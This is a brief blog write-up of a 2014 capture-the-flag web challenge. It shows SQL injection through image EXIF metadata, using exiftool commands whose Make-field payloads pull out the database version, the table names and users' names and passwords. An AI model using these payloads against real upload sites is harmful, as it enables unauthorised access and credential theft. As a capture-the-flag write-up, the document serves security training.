23 October 2014

HACK.LU CTF 2014: ImageUpload WRITEUP

In the Wild Wild Web, there are really bad guys. The sheriff doesn't know them all. Therefore, he needs your help.
Upload pictures of criminals to this site and help the sheriff to arrest them.
You can make this Wild Wild Web much less wild!!!

Pictures will be deleted on regular basis!

it looks like an image upload website, and there's some login aswell
uploading a regular pictures returns back our picture made up in a box with these informations displayed


so it's getting some exifdata out of the image and displaying it, what's more ?
fuzzing in an image exifdata a bit gave back error of inserting in db.
so it's a SQL injection in insert into !
$ exiftool -Make="',(SELECT version()))-- a" 1.jpg 1 image files updated

and we got this back:

$ exiftool -Make="',(SELECT group_concat(table_name) from information_schema.tables WHERE table_schema=database() ))-- a" 1.jpg 1 image files updated


$ exiftool -Make="',(SELECT group_concat(name,0x7c,password) from users))-- a" 1.jpg 1 image files updated


loggin in with sheriff user and we got flag

You are sucessfully logged in.
Flag: flag{1_5h07_7h3_5h3r1ff}

No comments:

Post a Comment